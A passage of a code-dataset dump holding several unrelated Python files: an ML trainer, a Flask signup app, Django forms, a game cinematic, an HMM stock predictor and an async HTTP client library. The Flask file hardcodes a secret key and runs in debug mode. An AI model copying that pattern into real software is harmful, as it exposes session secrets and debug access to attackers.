list_files_per_path(list_folders, ext=None):\n \n files = [list_files(path_folder, ext=ext) for path_folder in list_folders]\n return files\n\n#Initialize the dictionary with the inputs\ndef init_input_dictionary(config):\n inputs = {}\n\n inputs[\"Image\"] = []\n inputs[KEY_BACKGROUND_LAYER] = []\n inputs[KEY_SELECTED_REGIONS] = []\n inputs[KEY_LAYERS] = []\n inputs[KEY_VALIDATION_RATIO] = config.validation_ratio\n list_src_files = list_files_per_path(config.path_src)\n\n\n for idx_folder in range(len(list_src_files)):\n\n path_imgs = list_src_files[idx_folder]\n parent_path_regions = config.path_regions[idx_folder]\n\n print (path_imgs)\n dict_img = {}\n dict_img[KEY_RESOURCE_PATH] = path_imgs\n inputs[KEY_IMAGES].append(dict_img)\n\n path_regions = [ os.path.join(parent_path_regions, os.path.splitext(os.path.basename(path_imgs_i))[0] + \".png\") for path_imgs_i in path_imgs]\n dict_img = {}\n dict_img[KEY_RESOURCE_PATH] = path_regions\n inputs[KEY_SELECTED_REGIONS].append(dict_img)\n \n return inputs\n\n#########################################################################\n\nconfig = menu()\n\n# Fail if arbitrary layers are not equal before training occurs.\n\ninputs = init_input_dictionary(config)\noutputs = config.path_out\n\nprint(json.dumps(inputs, indent=2))\nprint(json.dumps(outputs, indent=2))\n\nnum_domains = len(inputs[KEY_IMAGES])\n\n# Call in training function\nstatus = training.train_domain_classifier(\n inputs=inputs,\n num_domains=num_domains,\n height=config.patch_height,\n width=config.patch_width,\n output_path=outputs,\n file_selection_mode=config.file_selection_mode,\n sample_extraction_mode=config.sample_extraction_mode,\n epochs=config.max_epochs,\n number_samples_per_class=config.number_samples_per_class,\n batch_size=config.batch_size,\n)\n\nprint(\"Finishing the Fast CM trainer job.\")\n\n","repo_name":"DDMAL/automatic_model_selection","sub_path":"train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32389575616","text":"from flask import Flask, render_template, redirect, request, url_for\r\nfrom forms import SignUpForm\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = '54bed9a3aef0167858e71664dd1ba697'\r\n\r\n@app.route('/')\r\ndef home():\r\n return signup()\r\n# return 'Hello Underworld'\r\n#def home(): \r\n\r\n@app.route('/signup', methods=['GET', 'POST'])\r\ndef signup():\r\n form = SignUpForm()\r\n if form.is_submitted():\r\n result = request.form\r\n return render_template('user.html', result = result)\r\n\r\n return render_template('signup.html', form=form)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"das52038g/User_Auth","sub_path":"frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43308401218","text":"from django.contrib.auth.models import User\r\nfrom django import forms\r\nfrom models import UserProfile, Team\r\nfrom models import get_yearlist, get_createweek_year_week, get_teamlist, get_default_pick_deadline\r\nfrom django.utils import timezone\r\n\r\nimport pytz\r\n\r\nclass UserForm(forms.ModelForm):\r\n password = forms.CharField(widget=forms.PasswordInput())\r\n\r\n class Meta:\r\n model = User\r\n fields = ('username', 'email', 'first_name', 'last_name', 'password')\r\n\r\ndef team_choices():\r\n teamlist = [(team.team_name, team.team_name) for team in Team.objects.all().order_by('team_name')]\r\n return tuple([('--------', '--------')] + teamlist)\r\n\r\nclass UserProfileForm(forms.ModelForm):\r\n def __init__(self, *args, **kwargs):\r\n super(UserProfileForm, self).__init__(*args, **kwargs)\r\n self.fields['favorite_team'] = forms.ChoiceField(choices=team_choices())\r\n\r\n class Meta:\r\n model = UserProfile\r\n fields = ('company', 'preferredtz', 'favorite_team')\r\n\r\n def clean_favorite_team(self):\r\n team_name = self.cleaned_data['favorite_team']\r\n if team_name != '--------':\r\n valid_team_names = [team.team_name for team in Team.objects.all()]\r\n if team_name not in valid_team_names:\r\n raise forms.ValidationError(\"Your team is not in the database\")\r\n else:\r\n team_name = ''\r\n return team_name\r\n\r\ndef year_choices():\r\n yearlist = get_yearlist()\r\n thisyear = timezone.now().year\r\n if thisyear not in yearlist:\r\n yearlist.append(thisyear)\r\n return tuple((i, i) for i in yearlist)\r\n\r\nweek_choices = tuple((i, i) for i in range(1, 14))\r\nclass CreateWeekForm(forms.Form):\r\n def __init__(self, *args, **kwargs):\r\n super(CreateWeekForm, self).__init__(*args, **kwargs)\r\n (defaultyear, defaultweek) = get_createweek_year_week()\r\n self.initial['year'] = defaultyear\r\n self.initial['week'] = defaultweek\r\n self.fields['year'] = forms.ChoiceField(choices=year_choices())\r\n self.fields['week'] = forms.ChoiceField(choices=week_choices)\r\n\r\n\r\n\r\nclass EditWeekForm(forms.Form):\r\n def __init__(self, *args, **kwargs):\r\n weekfields = {}\r\n if 'weekfields' in kwargs:\r\n weekfields = kwargs.pop('weekfields')\r\n gamefields = {}\r\n if 'gamefields' in kwargs:\r\n gamefields = kwargs.pop('gamefields')\r\n super(EditWeekForm, self).__init__(*args, **kwargs)\r\n self.initial['pick_deadline'] = get_default_pick_deadline()\r\n self.initial['lock_picks'] = weekfields.get('lock_picks')\r\n self.fields['lock_picks'] = forms.ChoiceField(widget=forms.RadioSelect, choices=((True, 'Yes'), (False, 'No')))\r\n self.fields['pick_deadline'] = forms.DateTimeField(widget=forms.DateTimeInput)\r\n for i in range(1, 11):\r\n gamestr = 'game%d_' % i\r\n\r\n self.initial[gamestr + 'team1'] = gamefields.get(gamestr + 'team1')\r\n self.initial[gamestr + 'team2'] = gamefields.get(gamestr + 'team2')\r\n if gamefields.get(gamestr + 'favored') is not None:\r\n self.initial[gamestr + 'favored'] = 'Team%d' % gamefields[gamestr + 'favored']\r\n self.initial[gamestr + 'spread'] = gamefields.get(gamestr + 'spread')\r\n self.initial[gamestr + 'kickoff'] = gamefields.get(gamestr + 'kickoff')\r\n\r\n self.fields[gamestr + 'team1'] = forms.ChoiceField(choices=tuple((t, t) for t in get_teamlist()))\r\n self.fields[gamestr + 'team2'] = forms.ChoiceField(choices=tuple((t, t) for t in get_teamlist()))\r\n self.fields[gamestr + 'favored'] = forms.ChoiceField(widget=forms.RadioSelect, choices=tuple(('Team%d' % i, 'Team%d' % i) for i in range(1, 3)))\r\n self.fields[gamestr + 'spread'] = forms.DecimalField(decimal_places=1)\r\n self.fields[gamestr + 'kickoff'] = forms.DateTimeField(widget=forms.DateTimeInput, required=False)\r\n\r\n def clean(self):\r\n cleaned_data = super(EditWeekForm, self).clean()\r\n\r\n # This validates that all teams are unique\r\n teamset = set()\r\n duplicateteamset = set()\r\n numuniqueteams = 0\r\n for i in range(1, 11):\r\n gamestr = 'game%d_' % i\r\n teamset.add(cleaned_data[gamestr + 'team1'])\r\n if len(teamset) == numuniqueteams:\r\n duplicateteamset.add(cleaned_data[gamestr + 'team1'])\r\n numuniqueteams = len(teamset)\r\n teamset.add(cleaned_data[gamestr + 'team2'])\r\n if len(teamset) == numuniqueteams:\r\n duplicateteamset.add(cleaned_data[gamestr + 'team2'])\r\n numuniqueteams = len(teamset)\r\n\r\n\r\n # This validates spread\r\n for i in range(1, 11):\r\n gamestr = 'game%d_' % i\r\n spread = cleaned_data.get(gamestr + 'spread')\r\n if spread is not None:\r\n x = int(spread * 2)\r\n if x % 2 == 0:\r\n msg = 'Game %d spread must be offset by 1/2 point (ie. 0.5, 1.5, etc.)' % i\r\n self.add_error(gamestr + 'spread', msg)\r\n\r\n if duplicateteamset:\r\n raise forms.ValidationError(\r\n 'Duplicate teams found: %s.' % ','.join(duplicateteamset)\r\n )\r\n\r\n","repo_name":"Cloudxtreme/collegefootballpick10","sub_path":"pick10/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"28890434459","text":"from Beagle import API as BGL\nfrom Newfoundland.Object import Object\nfrom random import uniform\nfrom math import sin,cos\nfrom .TitleCard import TitleCard\nfrom ..CloudBackground import CloudBackground\n\nFADEOUT_START = 500 \nclass FakeCamera():\n def __init__(self):\n self.p = [-100.0,0.0]\n\nclass CinematicPlane(Object):\n primitive = BGL.primitive.unit_uv_square\n view = BGL.view.widescreen_16_9\n shader = BGL.assets.get(\"beagle-2d/shader/beagle-2d\")\n\n def __init__(self,ticker = lambda : None, texture = None, blendmode = None ):\n self.x = 0.0\n self.y = 0.0\n self.vx = 0.01\n self.filter_color = [ 0.0,0.0,0.0,0.0 ]\n self.base_filter = 1.0\n\n self.sx = 5.0\n self.sy = 5.0\n\n self.warping = False\n self.ticker = ticker\n self.texture = texture\n self.blendmode = blendmode\n\n def get_shader_params(self):\n return {\n \"texBuffer\" : self.texture,\n \"translation_local\" : [ 0, 0 ],\n \"scale_local\" : [ self.sx, self.sy ],\n \"translation_world\" : [ self.x, self.y ],\n \"scale_world\" : [ 0.8,0.8 ],\n \"view\" : CinematicPlane.view,\n \"rotation_local\" : 0.0,\n \"filter_color\" : self.filter_color,\n \"uv_translate\" : [ 0,0 ] }\n\n def tick(self):\n self.ticker(self)\n pass\n\n def render(self):\n CinematicPlane.primitive.render_shaded( CinematicPlane.shader, self.get_shader_params() )\n\nclass BeardCinematic():\n\n def __init__(self):\n\n self.white_texture = BGL.framebuffer.from_dims(1,1)\n with BGL.context.render_target(self.white_texture):\n BGL.context.clear(1.0,1.0,1.0,1.0)\n \n self.frame = 0.0\n owner = self\n def get_plane_ticker(id):\n def default_ticker(plane):\n plane._t += 0.07\n fadein = float( 0.15 / float((id)+1) )\n if(owner.frame<1600) and (owner.frame>0): \n for i in range (0,4): \n val = min(1.0,plane.filter_color[i] + (fadein/float(i+1)))\n plane.filter_color[i] = val\n if(owner.frame>FADEOUT_START): \n for i in range (0,4): \n val = max(0.0,plane.filter_color[i] - (fadein/float(i+1)))\n plane.filter_color[i] = val\n\n spd = 0.7\n if id == 0:\n plane.y -= (0.01)*spd\n if id == 1:\n plane.y -= (0.013)*spd\n if id == 2:\n plane.y -= (0.014)*spd\n if id == 3:\n plane.y -= (0.016)*spd\n if id == 4:\n plane.y -= (0.0135)*spd\n if id == 5:\n plane.y -= (0.019)*spd\n if id == 6:\n plane.y -= (0.022)*spd\n\n\n return default_ticker\n\n def plane_initializer(id):\n def set_defaults(plane):\n plane._t = uniform(0.0,6.3)\n\n plane.sx = 2.4\n plane.sy = 18.0\n plane.x += 5.0\n\n plane.y += 12.0\n if id == 6:\n plane.y += 6.0\n if id == 4:\n plane.y -= 6.0\n\n def default_initializer(plane):\n set_defaults(plane)\n return plane\n return default_initializer\n\n ################\n\n planes = [\n (BGL.assets.get('KT-forest/texture/GB-00_bg'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-01_light1'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-02_light2'), BGL.blendmode.add ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard0shadow'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard1'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard2'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard3'), BGL.blendmode.alpha_over )\n ]\n\n self.cinematic_planes = []\n for id, plane in enumerate(planes):\n self.cinematic_planes.append(\n plane_initializer(id)(CinematicPlane( texture = plane[0], blendmode = plane[1], ticker = get_plane_ticker(id) ))\n )\n\n self.camera = FakeCamera()\n self.title_card = TitleCard();\n self.title_card.reset(\"The GREYBEARDS protect DEEP SOVEREIGN\", False)\n self.title_card.centerx = 16\n self.title_card.top = 32\n\n def tick(self):\n self.title_card.tick()\n for plane in self.cinematic_planes: plane.tick()\n self.frame = self.frame + 1.0\n\n if( self.frame == 350):\n self.title_card.top = 64\n self.title_card.reset(\"They created the LORD series\",False)\n if( self.frame == 810):\n self.title_card.top = 160\n self.title_card.reset(\"A new type of anti-virus...\",False)\n if( self.frame == 1050):\n self.title_card.top = 192\n self.title_card.reset(\"innoculated with HUMANITY\",False)\n\n ## The Infection is Spreading \n\n #self.camera.p[0] -= 0.01\n\n if self.frame < 2850:\n return True\n return False\n\n def render(self):\n BGL.context.clear( 0.0,0.0,0.0,1.0);\n for plane in self.cinematic_planes:\n with plane.blendmode:\n plane.render()\n with BGL.blendmode.alpha_over:\n self.title_card.render()\n\n\n","repo_name":"dzz/kthuune","sub_path":"src/Cinematics/BeardCinematic.py","file_name":"BeardCinematic.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43137317282","text":"import numpy as np\nimport pandas as pd\nfrom hmmlearn import hmm\nfrom utils import *\nimport matplotlib.pyplot as plt\nimport pickle\n\n# configuration\nblock_size = 30\nnum_states = 3\ntransmat_init = np.array([[1/num_states]*num_states]*num_states)\nstartprob_init = np.array([1, 0, 0])\n\nprint('Transition matrix: ')\nprint(transmat_init)\nprint('start prob: ')\nprint(startprob_init)\n\n\n#set numpy options\n#prevent truncated output\nnp.set_printoptions(threshold=np.inf)\nnp.set_printoptions(formatter={'float': '{:g}'.format})\n\n#import data from csv\ncolnames=['date', 'open', 'high', 'low', 'close', 'Adj Close', 'Volume']\nX = pd.read_csv('NSEI.csv', names=colnames, header=None)\nX = X.iloc[1:, 4].dropna()\n#X = X.drop(X.columns[[0]], axis=1)\nX = X.values.reshape(-1,1)\nprint(' ')\nprint(X.shape)\n\nX_train, X_test = X[:1346,0].reshape(-1,1), X[1347:,0].reshape(-1,1)\n#print(X_train)\n\nprint('Past dataset length:')\nprint(len(X_train))\nprint('Current dataset length: ')\nprint(len(X_test))\n\n# construct a sequence of past dataset\nseq_l = []\nseq = None\nlengths = []\n# iterate through dataframe\nfor i in range(0, len(X_train)-block_size + 1):\n\tprint(' Sequence construct iteration {}'.format(i+1))\n\tdf = X_train[i:i+block_size,0].reshape(-1, 1).astype('float64')\t\n\tseq_l.append(df)\n#\tprint(df)\n\tif (seq is None):\t\n\t\tseq = df\n\t\tlengths.append(len(df))\n\telse:\n\t\tseq = np.concatenate([seq, df])\n\t\tlengths.append(len(df))\n\nobs = {'y_pred': [], 'y': [], 'x': []}\t\t\n# iterate through the test dataset to predict\nfor i in range(0, len(X_test)-block_size):\n\tprint(' Predict iteration {}'.format(i+1))\n\tdf = X_test[i:i+block_size,0].reshape(-1, 1).astype('float64')\n\t\n\tcurr_index = df[-1,0]\n\tnext_index = float(X_test[i+block_size,0])\n\t# init \n\t#print(X_init)\n\tmean = np.mean(df)\n\n\tNm = np.random.normal(size=(1,num_states))\n\tmeans_pre = (Nm + mean)\n\n\tmeans_init = []\n\tfor j in range(num_states):\n\t\tmeans_init.append([means_pre[0][j]])\n\t\t\n\tmeans_init = np.array(means_init)\t\n\t\t\n\tstd_init = np.tile(np.identity(1), (3,1,1))*np.std(df)\n\n\tprint('Means: ')\n\tprint(means_init)\n\tprint('Covars: ')\n\tprint(std_init)\n\t\n\t# init the model\n\tmodel = hmm.GaussianHMM(n_components=num_states, covariance_type=\"full\", n_iter=100, init_params='')\n\n\t# init the model\n\tmodel.startprob_ = startprob_init\n\tmodel.transmat_ = transmat_init\n\tmodel.means_ = means_init\n\tmodel.covars_ = std_init\n\t\n\t# train the model\n\tmodel = model.fit(df)\n\t\n\t# calulate curr probability\n\tcurr_prob = model.score(df)\n\t\n\tmin = np.inf\n\tmin_val = None\n\tmin_seq = None\n\tnext_min_seq = None\n\t# traverse the sequences \n\tfor k, s in reversed(list(enumerate(seq_l))):\n\t\tpast_prob = model.score(s)\n#\t\tprint('Current: {} Past: {}'.format(curr_prob, past_prob))\n\t\t\n\t\tdiff = abs(curr_prob - past_prob)\n\t\tif (k+1 == len(seq_l)):\n\t\t\tcontinue\n\t\t\t\n\t\tif (diff < min):\n\t\t\tmin = diff\n\t\t\tmin_val = past_prob\n\t\t\tmin_seq = s\n\t\t\tnext_min_seq = seq_l[k+1]\t\n#\t\tif (np.isclose(curr_prob, past_prob, atol=10)):\n#\t\t\tfound = True\n#\t\t\tprint('Found!!')\n#\t\t\tbreak\n\t\n#\tif (found is False):\n#\t\tprint('Sorry not found...')\n#\t\tbreak\n\tlast_o = min_seq[-1,0]\n\tlast_o_n = next_min_seq[0,0]\n\to_diff = last_o_n - last_o\n\tpred_index = curr_index + o_diff\n\tprint('Diff: {}'.format(o_diff)) \n\tprint('i: {} Real: {} Prediction {}'.format(i+1, next_index, pred_index))\n\tobs['y_pred'].append(pred_index)\n\tobs['y'].append(next_index)\n\tobs['x'].append(i+1)\n\n# save the observations\nnp.save('obs.npy', obs)\n\nplt.plot(obs['x'], obs['y_pred'])\nplt.plot(obs['x'], obs['y'])\nplt.xlabel('Day')\nplt.ylabel('Index')\nfig = plt.gcf()\n#plt.show()\t\n\nloc = 'obs.png'\nfig.savefig(loc, dpi=1000, bbox_inches='tight')\n\nloc = 'obs.eps'\nfig.savefig(loc, format='eps', dpi=1000, bbox_inches='tight')\n\t\t\t\t\t\n# Clear the plot\nplt.clf()\nplt.cla()\nplt.close()\t\n\t\t\t\n\t\n","repo_name":"sbhTWR/StochasticAssignment","sub_path":"pred_seq.py","file_name":"pred_seq.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27621087866","text":"# 2016. 1. 10 by Hans Roh hansroh@gmail.com\n\n__version__ = \"0.29.3.18\"\n\nversion_info = tuple (map (lambda x: not x.isdigit () and x or int (x), __version__.split (\".\")))\n\nimport os, sys\nfrom rs4 import asyncore\nimport timeit\nimport time, math, random\nfrom . import lifetime, queue, request_builder, response_builder, stubproxy\nfrom rs4 import logger as logger_f, tc\nfrom .client import socketpool\nfrom .dbapi import dbpool\nfrom .client import adns, asynconnect\nfrom .athreads.fifo import await_fifo\nfrom . import client, dbapi\nfrom aquests.protocols import dns\nfrom .protocols.http import localstorage as ls\nfrom .protocols.http import request_handler, response as http_response\nfrom .protocols import http2\nfrom .protocols.http2 import H2_PROTOCOLS\nfrom .dbapi import request as dbo_request\nimport copy\n\nDEBUG = 0\n\ntry:\n\tfrom urllib.parse import urlparse\nexcept ImportError:\n\tfrom urlparse import urlparse\n\ndef cb_gateway_demo (response):\n\tglobal _logger\n\n\ttry: cl = len (response.content)\n\texcept: cl = 0\n\tif isinstance (response, dbo_request.Request):\n\t\tstatus = \"DBO %s %s %d records/documents received\"\t% (\n\t\t\tresponse.code,\n\t\t\tresponse.msg,\n\t\t\tcl\n\t\t)\n\telse:\n\t\tstatus = \"HTTP/%s %s %s %d bytes received\" % (\n\t\t\tresponse.version,\n\t\t\tresponse.code,\n\t\t\tresponse.msg,\n\t\t\tcl\n\t\t)\n\n\t_logger.log (\n\t\t\"REQ %s-%d. %s\" % (\n\t\tresponse.meta ['req_method'],\n\t\tresponse.meta ['req_id'],\n\t\tstatus\n\t\t)\n\t)\n\t#print (response.headers)\n\t#print (response.data)\n\n\n_request_total = 0\n_finished_total = 0\n_initialized = False\n_logger = None\n_cb_gateway = cb_gateway_demo\n_concurrent = 1\n_workers = 1\n_currents = {}\n_que = None\n_dns_query_req = {}\n_timeout = 10\n_max_conns = 0\n_bytesrecv = 0\n_allow_redirects = True\n_force_h1 = False\nresult = None\n_http_status = {}\n_http_version = {}\n\ndef configure (\n\tworkers = 1,\n\tlogger = None,\n\tcallback = None,\n\ttimeout = 10,\n\tcookie = False,\n\tforce_http1 = False,\n\thttp2_constreams = 1,\n\tallow_redirects = True,\n\tqrandom = False,\n\tuse_pool = True,\n\ttracking = False,\n\tbackend = False,\n\tdns = []\n):\n\tglobal _logger, _cb_gateway, _concurrent, _initialized, _timeout\n\tglobal _workers, _que, _allow_redirects, _force_h1\n\n\tif logger is None:\n\t\tlogger = logger_f.screen_logger ()\n\t_logger = logger\n\n\tif qrandom:\n\t\t_que = queue.RandomQueue ()\n\telse:\n\t\t_que = queue.Queue ()\n\n\t_allow_redirects = allow_redirects\n\t_force_h1 = request_handler.RequestHandler.FORCE_HTTP_11 = force_http1\n\n\tif not use_pool:\n\t\tasynconnect.AsynConnect.keep_connect = use_pool\n\t\tasynconnect.AsynSSLConnect.keep_connect = use_pool\n\tif not _force_h1:\n\t\tasynconnect.AsynConnect.fifo_class = await_fifo\n\t\tasynconnect.AsynSSLConnect.fifo_class = await_fifo\n\n\thttp2.MAX_HTTP2_CONCURRENT_STREAMS = http2_constreams\n\t_workers = workers\n\t_concurrent = workers\n\n\tif not force_http1:\n\t\t_concurrent = workers * http2_constreams\n\telif http2_constreams:\n\t\tpass\n\t\t#_logger (\"parameter http2_constreams is ignored\", \"warn\")\n\n\tif callback:\n\t\t_cb_gateway = callback\n\n\tif cookie:\n\t\tls.create (_logger)\n\t_timeout = timeout\n\tclient.set_timeout (timeout)\n\tdbapi.set_timeout (timeout)\n\n\tsocketpool.create (_logger, backend = backend, use_pool = use_pool)\n\tdbpool.create (_logger, backend = backend)\n\tadns.init (_logger, dns)\n\tlifetime.init (_timeout / 2., logger) # maintern interval\n\tif tracking:\n\t\tlifetime.enable_memory_track ()\n\t_initialized = True\n\ndef _reque_first (request):\n\tglobal _que\n\n\t_que.first (request)\n\ndef handle_status_401 (response):\n\tglobal _que\n\tif not response.request.get_auth () or response.request.reauth_count:\n\t\treturn response\n\n\t_logger (\"authorization failed, %s\" % response.url, \"info\")\n\trequest = response.request\n\trequest.reauth_count = 1\n\t_reque_first (request)\n\ndef handle_status_3xx (response):\n\tglobal _allow_redirects\t, _que\n\n\tif not _allow_redirects:\n\t\treturn response\n\tif response.status_code not in (301, 302, 307, 308):\n\t\treturn response\n\n\tnewloc = response.get_header ('location')\n\toldloc = response.request.uri\n\trequest = response.request\n\n\tif newloc == oldloc:\n\t\tresponse.response = http_response.FailedResponse (711, \"Redirect Error\", request)\n\t\treturn response\n\n\ttry:\n\t\trequest.relocate (response.response, newloc)\n\texcept RuntimeError:\n\t\tresponse.response = http_response.FailedResponse (711, \"Redirect Error\", request)\n\t\treturn response\n\n\t#_logger (\"%s redirected to %s from %s\" % (response.status_code, newloc, oldloc), \"info\")\n\t# DO NOT use relocated response.request, it is None\n\t_reque_first (request)\n\ndef _request_finished (handler):\n\tglobal _cb_gateway, _currents, _concurrent, _finished_total, _logger, _bytesrecv,_force_h1\n\tglobal _http_status, _http_version\n\n\treq_id = handler.request.meta ['req_id']\n\ttry:\n\t\t_currents.pop (req_id)\n\texcept KeyError:\n\t\tpass\n\n\tif isinstance (handler, dbo_request.Request):\n\t\tresponse = handler\n\n\telse:\n\t\tresponse = response_builder.HTTPResponse (handler.response)\n\n\t\ttry:\n\t\t\tfor handle_func in (handle_status_401, handle_status_3xx):\n\t\t\t\tresponse = handle_func (response)\n\t\t\t\tif not response:\n\t\t\t\t\t# re-requested\n\t\t\t\t\treturn req_if_queue (req_id)\n\t\texcept:\n\t\t\t_logger.trace ()\n\n\t_finished_total += 1\n\tresponse.logger = _logger\n\t_bytesrecv += len (response.content)\n\n\ttry: _http_status [response.status_code] += 1\n\texcept KeyError: _http_status [response.status_code] = 1\n\ttry: _http_version [response.version] += 1\n\texcept KeyError: _http_version [response.version] = 1\n\n\tcallback = response.meta ['req_callback'] or _cb_gateway\n\ttry:\n\t\tcallback (response)\n\texcept:\n\t\t_logger.trace ()\n\n\treq_if_queue (req_id)\n\ndef req_if_queue (req_id):\n\tglobal _logger, _currents\n\n\ttry:\n\t\tqsize () and _req ()\n\texcept RecursionError:\n\t\ttry:\n\t\t\t_currents.pop (req_id)\n\t\texcept KeyError:\n\t\t\tpass\n\t\t_logger (\"too many error occured, failed requeueing\", \"fail\")\n\ndef _req ():\n\tglobal _que, _logger, _currents, _request_total, _backend\n\targs = _que.get ()\n\n\tif args is None:\n\t\treturn\n\n\t_request_total += 1\n\t_is_request = False\n\t_is_db = False\n\t_method = None\n\n\tif type (args) is not tuple:\n\t\treq = args\n\t\tmeta = req.meta\n\t\t_is_request = True\n\t\t_is_db = hasattr (req, 'dbtype')\n\n\telse:\n\t\t_is_request = False\n\t\t_method = args [0].lower ()\n\n\tif _is_db or _method in (\"postgresql\", \"redis\", \"mongodb\", \"sqlite3\"):\n\t\tif not _is_request:\n\t\t\tmethod, server, (dbmethod, params), dbname, auth, meta = args\n\t\t\tasyncon = dbpool.get (server, dbname, auth, \"*\" + _method)\n\t\t\treq = request_builder.make_dbo (_method, server, dbmethod, params, dbname, auth, meta, _logger)\n\t\telse:\n\t\t\tasyncon = dbpool.get (req.server, req.dbname, req.auth, \"*\" + req.dbtype)\n\n\t\t_currents [meta ['req_id']] = [0, req.server]\n\t\treq.set_callback (_request_finished)\n\t\tasyncon.execute (req)\n\n\telse:\n\t\tif not _is_request:\n\t\t\tmethod, url, params, auth, headers, meta, proxy = args\n\t\t\tasyncon = socketpool.get (url)\n\t\t\tif _method in (\"ws\", \"wss\"):\n\t\t\t\treq = request_builder.make_ws (_method, url, params, auth, headers, meta, proxy, _logger)\n\t\t\telse:\n\t\t\t\treq = request_builder.make_http (_method, url, params, auth, headers, meta, proxy, _logger)\n\n\t\telse:\n\t\t\tasyncon = socketpool.get (req.uri)\n\n\t\t_currents [meta ['req_id']] = [0, req.uri]\n\t\thandler = req.handler (asyncon, req, _request_finished)\n\t\tif asyncon.get_proto () and asyncon.isconnected ():\n\t\t\tasyncon.handler.handle_request (handler)\n\t\telse:\n\t\t\thandler.handle_request ()\n\ndef workings ():\n\tglobal _currents\n\treturn \tlen (_currents)\n\ndef countreq ():\n\tglobal _request_total\n\treturn \t_request_total\n\ndef qsize ():\n\tglobal _que\n\treturn _que.qsize ()\n\ndef mapsize ():\n\treturn len (asyncore.socket_map)\n\ndef countfin ():\n\tglobal _finished_total\n\treturn _finished_total\n\ndef countcli ():\n\tglobal _currents\n\treturn _currents\n\ndef concurrent ():\n\tglobal _concurrent\n\treturn _concurrent\n\ndef fetchall ():\n\tglobal _workers, _logger, _que, _timeout, _max_conns, _bytesrecv, _concurrent, _finished_total, _max_conns, _force_h1, _request_total, _bytesrecv\n\tglobal result, _http_status, _http_version\n\n\tif not qsize ():\n\t\t_logger.log ('no item in queue.')\n\t\treturn\n\n\tif not _initialized:\n\t\tconfigure ()\n\n\t_fetch_started = timeit.default_timer ()\n\t# IMP. mannually set\n\tlifetime._polling = 1\n\n\t# create initail workers\n\t#_logger (\"creating connection pool\", \"info\")\n\ttarget_socks = min (_workers, qsize ())\n\tfor i in range (target_socks):\n\t\t_req ()\n\n\tselect_timeout = 1.0\n\tif not _force_h1 and http2.MAX_HTTP2_CONCURRENT_STREAMS > 1:\n\t\t# wait all availabale\n\t\twhile qsize ():\n\t\t\tlifetime.lifetime_loop (select_timeout, 1)\n\t\t\ttarget_socks = sum ([1 for conn in asyncore.socket_map.values () if hasattr (conn, \"get_proto\") and not isinstance (conn, (dns.UDPClient, dns.TCPClient)) and conn.get_proto () in H2_PROTOCOLS and conn.connected and not conn.isactive ()])\n\t\t\tif target_socks == _workers:\n\t\t\t\t#_logger ('%d connection(s) created' % target_socks, 'info')\n\t\t\t\tbreak\n\n\t# now starting\n\tif http2.MAX_HTTP2_CONCURRENT_STREAMS == 1:\n\t\tmeasurement = min\n\telse:\n\t\tmeasurement = max\n\n\twhile qsize () or _currents:\n\t\tlifetime.lifetime_loop (select_timeout, 1)\n\t\twhile _concurrent > measurement (len (_currents), mapsize ()) and qsize ():\n\t\t\t_req ()\n\t\t\t_max_conns = max (_max_conns, mapsize ())\n\t\t#print ('--', len (_currents), mapsize (), qsize ())\n\t\tif not mapsize ():\n\t\t\tbreak\n\n\tlifetime._polling = 0\n\t_duration = timeit.default_timer () - _fetch_started\n\tsocketpool.cleanup ()\n\tdbpool.cleanup ()\n\tresult = Result (_finished_total, _duration, _bytesrecv, _max_conns, copy.copy (_http_status), copy.copy (_http_version))\n\n\t# reinit for next session\n\t_request_total = 0\n\t_finished_total = 0\n\t_max_conns = 0\n\t_bytesrecv = 0\n\t_http_status = {}\n\t_http_version = {}\n\nclass Result:\n\tdef __init__ (self, tasks, duration, bytes_recv, max_conns, _http_status, _http_version):\n\t\tself.tasks = tasks\n\t\tself.duration = duration\n\t\tself.bytes_recv = bytes_recv\n\t\tself.max_conns = max_conns\n\t\tself._http_status = _http_status\n\t\tself._http_version = _http_version\n\n\tdef report (self):\n\t\tprint (tc.debug (\"summary\"))\n\t\tprint (\"- finished in: {:.2f} seconds\".format (self.duration))\n\t\tprint (\"- requests: {:,} requests\".format (self.tasks))\n\t\tprint (\"- requests/sec: {:.2f} requests\".format (self.tasks / self.duration))\n\t\tprint (\"- bytes recieved: {:,} bytes\".format (self.bytes_recv))\n\t\tprint (\"- bytes recieved/sec: {:,} bytes\".format (int (self.bytes_recv / self.duration)))\n\n\t\tprint (tc.debug (\"response status codes\"))\n\t\tfor k, v in sorted (self._http_status.items ()):\n\t\t\tprint (\"- {}: {:,}\".format (k, v))\n\t\tprint (tc.debug (\"response HTTP versions\")\t)\n\t\tfor k, v in sorted (self._http_version.items ()):\n\t\t\tprint (\"- {}: {:,}\".format (k, v))\n\n\ndef suspend (timeout):\n\ta, b = math.modf (timeout)\n\tfor i in range (int (b)):\n\t\tsocketpool.noop ()\n\t\ttime.sleep (1)\n\ttime.sleep (a)\n\n_dns_reqs = 0\ndef _add (method, url, params = None, auth = None, headers = {}, callback = None, meta = None, proxy = None):\n\tglobal _que, _initialized, _dns_query_req, _dns_reqs, _workers\n\n\tif not _initialized:\n\t\tconfigure ()\n\n\tif not meta:\n\t\tmeta = {}\n\n\tmeta ['req_id'] = _que.req_id\n\tmeta ['req_method'] = method\n\tmeta ['req_callback'] = callback\n\t_que.add 